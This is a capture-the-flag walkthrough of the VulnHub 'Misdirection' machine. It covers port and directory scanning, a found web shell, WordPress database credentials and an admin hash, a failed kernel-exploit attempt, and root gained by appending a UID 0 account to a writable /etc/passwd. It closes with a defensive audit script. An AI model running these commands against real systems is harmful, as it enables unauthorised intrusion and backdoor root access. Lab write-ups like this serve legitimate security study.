This box is called "Misdirection", and it lives up to its name: plenty of information looks sensitive but is actually useless.
Ports

nmap host discovery

    nmap -sn 192.168.227.0/24
    Nmap scan report for 192.168.227.74
    Host is up (0.00020s latency).

.74 is the newly appeared machine; that is the target.

nmap port scan

    nmap -Pn 192.168.227.74 --min-rate 10000 -oA nmap/scan

Scan the open ports and save the results under nmap/scan.

    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    3306/tcp open  mysql
    8080/tcp open  http

Four open ports found.

    nmap -sT -sC -sV -O -p80 -oA nmap/scan 192.168.227.74

Detailed port scan:
-sT: full TCP connect scan
-sC: default script scan
-sV: service version detection
-O: OS detection

    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 ecbb44eef333af9fa5ceb5776145e436 (RSA)
    |   256 677bcb4e951b78088d2ab147048d6287 (ECDSA)
    |_  256 59041d25116d89a36c6de4e3d23cda7d (ED25519)
    80/tcp   open  http    Rocket httpd 1.2.6 (Python 2.7.15rc1)
    |_http-title: Site doesn't have a title (text/html; charset=utf-8).
    |_http-server-header: Rocket 1.2.6 Python/2.7.15rc1
    3306/tcp open  mysql   MySQL (unauthorized)
    8080/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-title: Apache2 Ubuntu Default Page: It works
    |_http-server-header: Apache/2.4.29 (Ubuntu)

There is too much port information, so go straight to a vulnerability script scan:

    PORT     STATE SERVICE
    22/tcp   open  ssh
    80/tcp   open  http
    | http-csrf:
    | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.227.74
    |   Found the following possible CSRF vulnerabilities:
    |
    |     Path: http://192.168.227.74:80/init/default/elections
    |     Form id: auth_user_email__row
    |_    Form action: #
    | http-enum:
    |   /admin/: Possible admin folder
    |   /admin/admin/: Possible admin folder
    |   /admin/backup/: Possible backup
    |   /admin/download/backup.sql: Possible database backup
    |_  /examples/: Sample scripts
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-sql-injection:
    |   Possible sqli for queries:
    |     http://192.168.227.74:80/init/default/user/login?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
    |     http://192.168.227.74:80/init/default/user/request_reset_password?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
    |     http://192.168.227.74:80/init/default/user/register?_next=%2Finit%2Fdefault%2Findex%27%20OR%20sqlspider
    |_    http://192.168.227.74:80/init/default/user/login?_next=%2Finit%2Fdefault%2Felections%27%20OR%20sqlspider
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    3306/tcp open  mysql
    8080/tcp open  http-proxy
    | http-enum:
    |   /wordpress/: Blog
    |   /wordpress/wp-login.php: Wordpress login page.
    |   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
    |   /debug/: Potentially interesting folder
    |   /development/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
    |   /help/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
    |   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
    |   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
    |   /manual/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
    |_  /scripts/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'

Points worth noting:
the directories enumerated on port 80, and the possible SQL injection;
port 3306 shows a MySQL service is deployed;
the directories enumerated on port 8080, which is a WordPress install.
Foothold

Website information gathering

Port 80 is a web service built from an open-source project on GitHub. Port 8080 is a WordPress service (the blog seems inaccessible, because all of its links request the address 192.168.1.61, presumably the fixed IP the box had when it was built).

Directory scan

Scan port 8080:

    gobuster dir -u http://192.168.227.74:8080/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-small.txt -x php,html --add-slash

    /.php/            (Status: 403) [Size: 296]
    /images/          (Status: 200) [Size: 745]
    /help/            (Status: 200) [Size: 741]
    /icons/           (Status: 403) [Size: 297]
    /.html/           (Status: 403) [Size: 297]
    /scripts/         (Status: 200) [Size: 747]
    /css/             (Status: 200) [Size: 739]
    /wordpress/       (Status: 500) [Size: 2696]
    /development/     (Status: 200) [Size: 755]
    /manual/          (Status: 200) [Size: 745]
    /js/              (Status: 200) [Size: 737]
    /shell/           (Status: 200) [Size: 743]
    /debug/           (Status: 200) [Size: 12908]
    /.html/           (Status: 403) [Size: 297]
    /.php/            (Status: 403) [Size: 296]
    /server-status/   (Status: 403) [Size: 305]

Try them one by one; in the end the debug directory turns out to be a web shell. Ignore all the other information and go straight in to escalate privileges!!
Privilege escalation (the following is the trial-and-error process; to see the escalation that actually works, skip this step)

Go into the web root /var/www/html and check whether there is any configuration content.

    cd /var/www/html
    css  development  images  js  scripts  wordpress  debug  help  index.html  manual  shell

Seeing wordpress, go straight in and look: wp-config.php is there, and opening it hands over the MySQL login credentials right away.

    define( 'DB_NAME', 'wp_myblog' );
    /** MySQL database username */
    define( 'DB_USER', 'blog' );
    /** MySQL database password */
    define( 'DB_PASSWORD', 'abcdefghijklmnopqrstuv' );

Don't rush to use them; gather more information first.

    cat /etc/crontab

Check the scheduled tasks: there is nothing there.

    uname -a

Check the Linux version: kernel 4.15.

    sudo -l

This shows:

    User www-data may run the following commands on localhost:
        (brexit) NOPASSWD: /bin/bash

    cat /etc/passwd

Check the users: the brexit user really does exist, so log in as it and look around.

    brexit:x:1000:1000:brexit:/home/brexit:/bin/bash
Log in as brexit

    sudo -u brexit /bin/bash

In the brexit user's home directory /home/brexit there is a web2py project. A quick Google search shows it is a Python web framework, so look for configuration information. Inside the project there is web2py-scheduler.conf; look at its contents.

The contents of web2py-scheduler.conf are as follows:

    description "web2py task scheduler"
    # INSTRUCTIONS:
    # COPY THIS FILE IN:
    # /etc/init/web2py-scheduler.con
    #
    # To start/stop the scheduler, use
    # "sudo start web2py-scheduler"
    # "sudo stop web2py-scheduler"
    # "sudo status web2py-scheduler"
    #
    # YOU MAY HAVE TO EDIT PATH TO WEB2PY BELOW
    start on (local-filesystems and net-device-up IFACE=eth0)
    stop on shutdown
    # Give up if restart occurs 8 times in 60 seconds.
    respawn limit 8 60
    exec sudo -u www-data python /home/www-data/web2py/web2py.py -K parking > /tmp/scheduler.out
    respawn

Analysis: this is the task scheduler of the web2py framework; the service can be started, stopped and inspected with sudo start/stop/status web2py-scheduler. The file has to be placed at /etc/init/web2py-scheduler.conf, the usual path for Upstart configuration files on Linux, which manage the starting and stopping of system services. It runs the web2py.py script as www-data, so modifying web2py.py cannot yield root. This is a misdirection item. More importantly, with our current privileges, neither www-data nor brexit can copy it into /etc/init.
With no other leads, log in to our MySQL and take a look.

Log in with the recovered credentials (no space between -p and the password, otherwise mysql treats the password as the database name):

    mysql -u blog -p'abcdefghijklmnopqrstuv'

After digging through the database for a long while there was nothing new, but the password hash of the WordPress blogger admin turned up:

    admin : $P$BC4vcMsqXqr/cc46cx.E1arnrBq1yU/

After capturing the hash, first consider whether cracking it is even necessary; if it is a misdirection item, just rule it out. First check whether /etc/passwd contains an admin user: it does not, so rule it out.

Next, see whether a kernel vulnerability can be used to escalate.

    searchsploit linux 4.15

The possible exploits are shown in the figure below.

Compile the C file with gcc, upload it to the target and run it; it complains that the glibc library is missing:

    ./pwn: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./pwn)
    ./pwn: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./pwn)

Then try whether the sh script works; it reports that gcc cannot be found:

    Command 'gcc' not found

gcc cannot be installed either: no permission.
Privilege escalation succeeded

Finally, look at the permissions on sensitive files; a permission misconfiguration is also a chance to escalate.

The main thing is to check whether /etc/passwd can be modified; if it can, we can add a new user in the root group.

    ls -la /etc/ | grep passwd
    -rwxrwxr--  1 root brexit 1786 Sep  8 12:21 passwd
    -rw-r--r--  1 root root   1602 Jun  1  2019 passwd-

The passwd file's group is brexit, and members of the brexit group have full permissions on it. That makes things easy: just create a new user and overwrite the file.

Create a new user and overwrite passwd (user: pwned, password: qwerty)

    openssl passwd -1 -salt pwned qwerty

Output: $1$pwned$M5PdlTdbF2x4W25c3mADr1

Then directly:

    echo 'pwned:$1$pwned$M5PdlTdbF2x4W25c3mADr1:0:0::/root:/bin/bash' >> /etc/passwd

This approach is not ideal, though; it is better to back up the original file first:

    cp /etc/passwd /tmp/passwd
    echo 'pwned:$1$pwned$M5PdlTdbF2x4W25c3mADr1:0:0::/root:/bin/bash' >> /etc/passwd

Switch user

    su pwned
    passwd: qwerty

This drops straight into root:

    brexit@misdirection:~/web2py$ su hack
    su pwned
    Password: qwerty
    root@misdirection:/home/brexit/web2py#
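As an added example (not part of the original writeup), here is a small POSIX shell audit a defender can run to catch the two things the escalation above depends on: a passwd file writable by a non-root group or by others, and a stray UID 0 entry carrying its own hash appended to it. It runs against a constructed sample file modelled on the box's final state, not against the real /etc/passwd.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit a passwd-format file for
# the group-writable misconfiguration and the appended UID 0 backdoor account.

# Constructed sample, modelled on the box's final /etc/passwd (not real data).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
brexit:x:1000:1000:brexit:/home/brexit:/bin/bash
pwned:$1$pwned$M5PdlTdbF2x4W25c3mADr1:0:0::/root:/bin/bash'

SAMPLE_FILE=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$SAMPLE_FILE"
chmod 664 "$SAMPLE_FILE"      # reproduce the box's group-writable passwd mode

# Return 0 if the mode bits allow group or "other" to write the file.
is_group_or_world_writable() {
    perms=$(ls -ld "$1" | cut -c1-10) || return 2
    case "$perms" in
        ?????w*|????????w*) return 0 ;;   # column 6 = group w, column 9 = other w
    esac
    return 1
}

# Print every account with UID 0 whose name is not root.
find_extra_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Print accounts whose password field is not delegated to /etc/shadow ("x")
# and not locked ("*" or "!"): an inline hash or an empty password.
find_weak_password_fields() {
    awk -F: '$2 != "x" && $2 != "*" && $2 != "!" { print $1 }' "$1"
}

# Run all checks on one file; return 1 if anything suspicious was found.
audit_passwd() {
    f=$1; rc=0
    if is_group_or_world_writable "$f"; then
        echo "WARN: $f is group/world writable: $(ls -ld "$f")"; rc=1
    fi
    for u in $(find_extra_uid0 "$f"); do echo "WARN: extra UID 0 account: $u"; rc=1; done
    for u in $(find_weak_password_fields "$f"); do echo "WARN: password field not in shadow: $u"; rc=1; done
    return $rc
}

audit_passwd "$SAMPLE_FILE" || echo "audit: issues found (expected for this sample)"
```

On a real host, replace SAMPLE_FILE with /etc/passwd; a clean system prints nothing and returns 0.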
Also: this machine has another privilege escalation technique, which the next article will try; it works through an image. For details see https://benheater.com/vulnhub-misdirection-1/